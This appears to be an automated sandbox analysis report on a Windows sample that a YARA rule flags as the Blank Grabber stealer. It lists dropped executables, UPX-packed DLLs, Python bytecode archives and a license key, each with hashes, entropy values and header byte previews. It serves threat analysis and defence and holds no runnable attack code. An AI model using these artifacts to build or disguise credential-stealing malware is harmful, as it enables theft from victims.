SHA-512: 20EDC7EAE5C0709AF5C792F04A8A633D416DA5A38FC69BD0409AFE40B7FB1AFA526DE6FE25D8543ECE9EA44FD6BAA04A9D316AC71212AE9638BDEF768E661E0F
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1481088
Entropy (8bit): 6.569811736013214
Encrypted: false
SSDEEP: 24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
MD5: AC633A9EB00F3B165DA1181A88BB2BDA
SHA1: D8C058A4F873FAA6D983E9A5A73A218426EA2E16
SHA-256: 8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
SHA-512: 4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\cstealer.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1138040
Entropy (8bit): 5.434701276929729
Encrypted: false
SSDEEP: 12288:JbYefjwR6nbJonRiPDjRrO518BEPYPx++ZiLKGZ5KXyVH4eDS0E:tYeMQ0IDJc+EwPgPOG6Xyd46S0E
MD5: BC58EB17A9C2E48E97A12174818D969D
SHA1: 11949EBC05D24AB39D86193B6B6FCFF3E4733CFD
SHA-256: ECF7836AA0D36B5880EB6F799EC402B1F2E999F78BFFF6FB9A942D1D8D0B9BAA
SHA-512: 4AA2B2CE3EB47503B48F6A888162A527834A6C04D3B49C562983B4D5AAD9B7363D57AEF2E17FE6412B89A9A3B37FB62A4ADE4AFC90016E2759638A17B1DEAE6C
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\ProgramData\Microsoft\based.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 98736
Entropy (8bit): 6.474996871326343
Encrypted: false
SSDEEP: 1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
MD5: F12681A472B9DD04A812E16096514974
SHA1: 6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
SHA-256: D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
SHA-512: 7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\ProgramData\Microsoft\based.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 48000
Entropy (8bit): 7.804339649997861
Encrypted: false
SSDEEP: 768:ZwAGUM8GBetg87It88blNUL6yfsFtHrrhhto+MQw5aZ/hLYpUHIDtVzR3YiSyvLk:OAG/k9MjCDErhhmQXfTHIDtVzV7SyD85
MD5: 0C13627F114F346604B0E8CBC03BAF29
SHA1: BF77611D924DF2C80AABCC3F70520D78408587A2
SHA-256: DF1E666B55AAE6EDE59EF672D173BD0D64EF3E824A64918E081082B8626A5861
SHA-512: C97FA0F0988581EAE5194BD6111C1D9C0E5B1411BAB47DF5AA7C39AAD69BFBECA383514D6AAA45439BB46EACF6552D7B7ED08876B5E6864C8507EAA0A72D4334
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\ProgramData\Microsoft\based.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 58744
Entropy (8bit): 7.8341561308362255
Encrypted: false
SSDEEP: 1536:kPWq49sE7fzlG5lNXdrYMP0MkeBvGhd0LYXIDQPTl7Syw0Pxv:kPWqKT1GLZdrDkHhOEXIDQPTl6Exv
MD5: 38FB83BD4FEBED211BD25E19E1CAE555
SHA1: 4541DF6B69D0D52687EDB12A878AE2CD44F82DB6
SHA-256: CD31AF70CBCFE81B01A75EBEB2DE86079F4CBE767B75C3B5799EF8B9F0392D65
SHA-512: F703B231B675C45ACCB1F05CD34319B5B3B7583D85BF2D54194F9E7C704FBCD82EF2A2CD286E6A50234F02C43616FBECCFD635AEFD73424C1834F5DCA52C0931
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[y..[y..[y..#.[y.. x..[y.. |..[y.. }..[y.. z..[y.. x..[y.O)}..[y.O)x..[y.).x..[y..[x.h[y.. t..[y.. y..[y.. ...[y.. {..[y.Rich.[y.................PE..d...n.Vc.........." ...!.........p...........................................@............`.........................................H<.......9.......0.......................<.......................................(..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):107384
                                                                                                                                                          Entropy (8bit):7.936833941258681
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:YzsRxWJXVyOgbHffu+MLtWH/WSWXb01KQiID5q1CAt6xN:PU/gbHfW6WSWLplCuG
                                                                                                                                                          MD5:7BA541DEFE3739A888BE466C999C9787
                                                                                                                                                          SHA1:AD0A4DF9523EEEAFC1E67B0E4E3D7A6CF9C4DFAC
                                                                                                                                                          SHA-256:F90EFA10D90D940CDE48AAFE02C13A0FC0A1F0BE7F3714856B7A1435F5DECF29
                                                                                                                                                          SHA-512:9194A527A17A505D049161935432FA25BA154E1AEE6306DEE9054071F249C891F0CA7839DE3A21D09B57FDC3F29EE7C4F08237B0DFFFAFA8F0078CFE464BED3B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.p.......... ........................................0............`..........................................,..P....)....... ..........H'...........-...................................... ...@...........................................UPX0....................................UPX1.....p.......h..................@....rsrc........ .......l..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):34688
                                                                                                                                                          Entropy (8bit):7.676872991541861
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:UA1cXZ83zNDKJ/KDQI5zbp61ypRcTID5IubYiSyvaPxWEw:UwnzKUQ+p6mcTID5Iub7SyiPx
                                                                                                                                                          MD5:596DF8ADA4B8BC4AE2C2E5BBB41A6C2E
                                                                                                                                                          SHA1:E814C2E2E874961A18D420C49D34B03C2B87D068
                                                                                                                                                          SHA-256:54348CFBF95FD818D74014C16343D9134282D2CF238329EEC2CDA1E2591565EC
                                                                                                                                                          SHA-512:E16AAD5230E4AF7437B19C3DB373B1A0A0A84576B608B34430CCED04FFC652C6FB5D8A1FE1D49AC623D8AE94C8735800C6B0A12C531DCDD012B05B5FD61DFF2E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.P..........@ .......................................@............`..........................................;..P....9.......0..........,............;......................................@,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):86400
                                                                                                                                                          Entropy (8bit):7.925569108441777
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:nomFQO4KV4FqKFztYJgYFlXeppHFEtnp8bacIUmDIDe1Ye7SyOePx:IO4KV0qKTYhFlupdQ8WLvIDe1Yehx
                                                                                                                                                          MD5:8D9E1BB65A192C8446155A723C23D4C5
                                                                                                                                                          SHA1:EA02B1BF175B7EF89BA092720B3DAA0C11BEF0F0
                                                                                                                                                          SHA-256:1549FE64B710818950AA9BF45D43FE278CE59F3B87B3497D2106FF793EFA6CF7
                                                                                                                                                          SHA-512:4D67306FE8334F772FE9D463CB4F874A8B56D1A4AD3825CFF53CAE4E22FA3E1ADBA982F4EA24785312B73D84A52D224DFB4577C1132613AA3AE050A990E4ABDF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24960
                                                                                                                                                          Entropy (8bit):7.454617838702341
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:cZ0Psz9rLZgNhzHjlnwX1hZa7gJXjDID7UuNBIYiSy1pCQYIPxh8E9VF0Nyb9:cnihFn43pzDID7Uu4YiSyv7PxWER
                                                                                                                                                          MD5:FBBBFBCDCF0A7C1611E27F4B3B71079E
                                                                                                                                                          SHA1:56888DF9701F9FAA86C03168ADCD269192887B7B
                                                                                                                                                          SHA-256:699C1F0F0387511EF543C0DF7EF81A13A1CFFDE4CE4CD43A1BAF47A893B99163
                                                                                                                                                          SHA-512:0A5BA701653CE9755048AE7B0395A15FBB35509BEF7C4B4FE7F11DC4934F3BD298BCDDBF2A05B61F75F8EB44C4C41B3616F07F9944E0620B031CBE87A7443284
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MX..#...#...#.......#..."...#...&...#...'...#... ...#..."...#.Q."...#..."...#.......#...#...#.......#...!...#.Rich..#.........................PE..d...d.Vc.........." ...!.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):42872
                                                                                                                                                          Entropy (8bit):7.71252337640455
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:eQ8MABQICeXD2rh0LklHwh20hpJ72IDQwzFDYiSyvGPxWERfsxi:eTieXEhow072IDQwzFD7Sy+Px3sxi
                                                                                                                                                          MD5:4351D7086E5221398B5B78906F4E84AC
                                                                                                                                                          SHA1:BA515A14EC1B076A6A3EAB900DF57F4F37BE104D
                                                                                                                                                          SHA-256:A0FA25EEF91825797F01754B7D7CF5106E355CF21322E926632F90AF01280ABE
                                                                                                                                                          SHA-512:A1BCF51E797CCAE58A0B4CFE83546E5E11F8FC011CA3568578C42E20BD7A367A5E1FA4237FB57AA84936EEC635337E457A61A2A4D6ECA3E90E6DDE18AE808025
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................*.......*.......*.......*.......$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):56192
                                                                                                                                                          Entropy (8bit):7.831040417505209
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:2fDL703/MAe3F53jYTG3vy+1MNLjZVID5QjI7SyBPx:wD03/MHbH6+eL/ID5QjIXx
                                                                                                                                                          MD5:D678600C8AF1EEEAA5D8C1D668190608
                                                                                                                                                          SHA1:080404040AFC8B6E5206729DD2B9EE7CF2CB70BC
                                                                                                                                                          SHA-256:D6960F4426C09A12488EB457E62506C49A58D62A1CB16FBC3AE66B260453C2ED
                                                                                                                                                          SHA-512:8FD5F0FD5BD60C6531E1B4AD867F81DA92D5D54674028755E5680FB6005E6444805003D55B6CBAF4CDAD7B4B301CFFAB7B010229F6FD9D366405B8ADE1AF72D9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pU..44..44..44..=Ls.04...O.64...O..54...O.94...O.<4...O.74...O.14...F.64..44.15...O.=4...O..54...O..54...O.54..Rich44..........................PE..d.....Vc.........." ...!.........`..P....p...................................0............`..........................................+..P....)....... .......................+..$...................................P...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):62336
                                                                                                                                                          Entropy (8bit):7.846104968038435
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:U6ll/oOM5AGIyI1asq3YGDTgzOordBQkJIDt7o7/7Syi/Px:B/6AGLIcsq3YGn0ZQuIDt7ojEHx
                                                                                                                                                          MD5:156B1FA2F11C73ED25F63EE20E6E4B26
                                                                                                                                                          SHA1:36189A5CDE36D31664ACBD530575A793FC311384
                                                                                                                                                          SHA-256:A9B5F6C7A94FB6BFAF82024F906465FF39F9849E4A72A98A9B03FC07BF26DA51
                                                                                                                                                          SHA-512:A8181FFEB3CF8EF2A25357217A3DD05242CC0165473B024CF0AEB3F42E21E52C2550D227A1B83A6E5DAB33A185D78E86E495E9634E4F4C5C4A1AEC52C5457DCA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B3"..RL,.RL,.RL,.*.,.RL,.)M-.RL,.)I-.RL,.)H-.RL,.)O-.RL,.)M-.RL,b(M-.RL,.RM,.SL,. M-.RL,.)A-.RL,.)L-.RL,.).,.RL,.)N-.RL,Rich.RL,........................PE..d.....Vc.........." ...!............0.....................................................`.........................................p...d....................P......................................................@...@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................
Process:C:\ProgramData\Microsoft\based.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):125377
Entropy (8bit):7.618849072392802
Encrypted:false
SSDEEP:3072:QA93WqBg7cnznoE76zBZKqLMsdNxziiGpK8U6z:QAPBKcnt7QqIMsFzpGpK8U6z
MD5:3969CC49C67612098C05EA0F4E5B4D83
SHA1:5D393AFCA28764097DBC2152F20797E408B87580
SHA-256:77A58177A8EC983F12FEA4FF445EE7605C7B876C241A5A2F2A87B35F5902DC17
SHA-512:5C55EEBA6796B1BBDA2AF48A540215FA6A4CBCB841939CEB2C5C3552892EFE6DD54267EA8DBE0238A3FD265682FDD5A66F3699156C8CF39DA7CE5B3C7656BBE2
Malicious:false
                                                                                                                                                          Preview:PK........,..XX..K...K.......stub-o.pyc..........;fz8........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................
Process:C:\ProgramData\Microsoft\based.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1189728
Entropy (8bit):7.945107908450931
Encrypted:false
SSDEEP:24576:jffQrZJIe6/4gho5HE1F03fkOyUU/BtSIgA0ft+rBFOWRIQ6sCY51CPwDv3uFfJv:Tf8JWwgho5HL3fknPSIKorCU1CPwDv3a
MD5:DAA2EED9DCEAFAEF826557FF8A754204
SHA1:27D668AF7015843104AA5C20EC6BBD30F673E901
SHA-256:4DAB915333D42F071FE466DF5578FD98F38F9E0EFA6D9355E9B4445FFA1CA914
SHA-512:7044715550B7098277A015219688C7E7A481A60E4D29F5F6558B10C7AC29195C6D5377DC234DA57D9DEF0C217BB3D7FECA332A64D632CA105503849F15E057EA
Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... .........@%.025..P%..................................P7...........`......................................... H5......C5.h....@5......`2.............H7......................................=5.@...........................................UPX0.....@%.............................UPX1.........P%.....................@....rsrc........@5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\ProgramData\Microsoft\based.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):25336
Entropy (8bit):7.563490694087984
Encrypted:false
SSDEEP:384:uJvjb6KaBBu0wYkP2C0yZbMRpZa7gJXMrRCXPDG4y8c3UhH3:Wvj+3BcMp8KDG4yshH
MD5:90A6B0264A81BB8436419517C9C232FA
SHA1:17B1047158287EB6471416C5DF262B50D6FE1AED
SHA-256:5C4A0D4910987A38A3CD31EAE5F1C909029F7762D1A5FAF4A2E2A7E9B1ABAB79
SHA-512:1988DD58D291EE04EBFEC89836BB14FCAAFB9D1D71A93E57BD06FE592FEACE96CDDE6FCCE46FF8747339659A9A44CDD6CF6AC57FF495D0C15375221BF9B1666E
Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....@................................................................`.....................................................................8.......................................................8...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\ProgramData\Microsoft\based.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):208224
Entropy (8bit):7.9214932539909775
Encrypted:false
SSDEEP:3072:5SI3oPlWLlPVVc5MpJa1pOjJnnioIZW8/Qf6bRXGKrs8qJjueW1LR/oSB6hetz:EIek5VC0FiHof6Z1rgJ63R/oS3
MD5:EAC369B3FDE5C6E8955BD0B8E31D0830
SHA1:4BF77158C18FE3A290E44ABD2AC1834675DE66B4
SHA-256:60771FB23EE37B4414D364E6477490324F142A907308A691F3DD88DC25E38D6C
SHA-512:C51F05D26FDA5E995FE6763877D4FCDB89CD92EF2D6EE997E49CC1EE7A77146669D26EC00AD76F940EF55ADAE82921DEDE42E55F51BD10D1283ECFE7C5009778
Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .....P...`..@....p................................................`..........................................6..4@...3.......0...........M...........v......................................@%..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\ProgramData\Microsoft\based.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1701240
Entropy (8bit):7.993696827956843
Encrypted:true
SSDEEP:49152:A0/71KAZkPw/a5lsjIa7hhXBOQSbMS5ffODwKh/Wc:vziPwCvZalhXOMIzQd
MD5:BB46B85029B543B70276AD8E4C238799
SHA1:123BDCD9EEBCAC1EC0FD2764A37E5E5476BB0C1C
SHA-256:72C24E1DB1BA4DF791720A93CA9502D77C3738EEBF8B9092A5D82AA8D80121D0
SHA-512:5E993617509C1CF434938D6A467EB0494E04580AD242535A04937F7C174D429DA70A6E71792FC3DE69E103FFC5D9DE51D29001A4DF528CFFFEFDAA2CEF4EAF31
Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!..........D...]...D...................................^...........`.........................................H.].......].......].......V../...........r^.....................................(.].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\ProgramData\Microsoft\based.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):630736
Entropy (8bit):6.409476333013752
Encrypted:false
SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
Process:C:\ProgramData\Microsoft\based.exe
File Type:ASCII text
Category:dropped
Size (bytes):456
Entropy (8bit):4.447296373872587
Encrypted:false
SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:4531984CAD7DACF24C086830068C4ABE
SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:true
Yara Hits:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI14722\rarreg.key, Author: Joe Security
                                                                                                                                                          Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
Process:C:\ProgramData\Microsoft\based.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):24960
Entropy (8bit):7.407412042104121
Encrypted:false
SSDEEP:384:5oJUAW1guHrhWgWLBNZa7gJXZjNID7Gu6OIYiSy1pCQlIJNPxh8E9VF0NyUT2:eJjW1J2pJjNID7GuIYiSyvCPxWEC
MD5:ABF7864DB4445BBBD491C8CFF0410AE0
SHA1:4B0F3C5C7BF06C81A2C2C5693D37EF49F642A9B7
SHA-256:DDEADE367BC15EA09D42B2733D88F092DA5E880362EABE98D574BC91E03DE30E
SHA-512:8F55084EE137416E9D61FE7DE19E4CFF25A4B752494E9B1D6F14089448EF93E15CD820F9457C6CE9268781BD08E3DF41C5284801F03742BC5C40B3B81FB798C5
Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\ProgramData\Microsoft\based.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):622976
Entropy (8bit):7.993556519822549
Encrypted:true
SSDEEP:12288:C7dpDQ1L3zfmrtWF/azVC9oAnShBJl4cZ1pzgULOX110jt3:0HSzzaQl8VSSh2cZXgULq11y
MD5:DDD0DD698865A11B0C5077F6DD44A9D7
SHA1:46CD75111D2654910F776052CC30B5E1FCEB5AEE
SHA-256:A9DD0275131105DF5611F31A9E6FBF27FD77D0A35D1A73A9F4941235FBC68BD7
SHA-512:B2EE469EA5A6F49BBDD553363BAA8EBAD2BAF13A658D0D0C167FDE7B82EB77A417D519420DB64F325D0224F133E3C5267DF3AA56C11891D740D6742ADF84DBE4
Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.0...0...............................................0............`.............................................L"......................\...........`-..........................................@...........................................UPX0....................................UPX1.....0.......&..................@....rsrc....0...........*..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\ProgramData\Microsoft\based.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):300920
Entropy (8bit):7.985723274612961
Encrypted:false
SSDEEP:6144:Z2Fuue6iwoBLhgXM5kayIQJCEUcHQdBAFEzz9DxsXcY:Z2/e6inLOoyVJ/LHQdgipxsMY
MD5:BB3FCA6F17C9510B6FB42101FE802E3C
SHA1:CB576F3DBB95DC5420D740FD6D7109EF2DA8A99D
SHA-256:5E2F1BBFE3743A81B00717011094798929A764F64037BEDB7EA3D2ED6548EB87
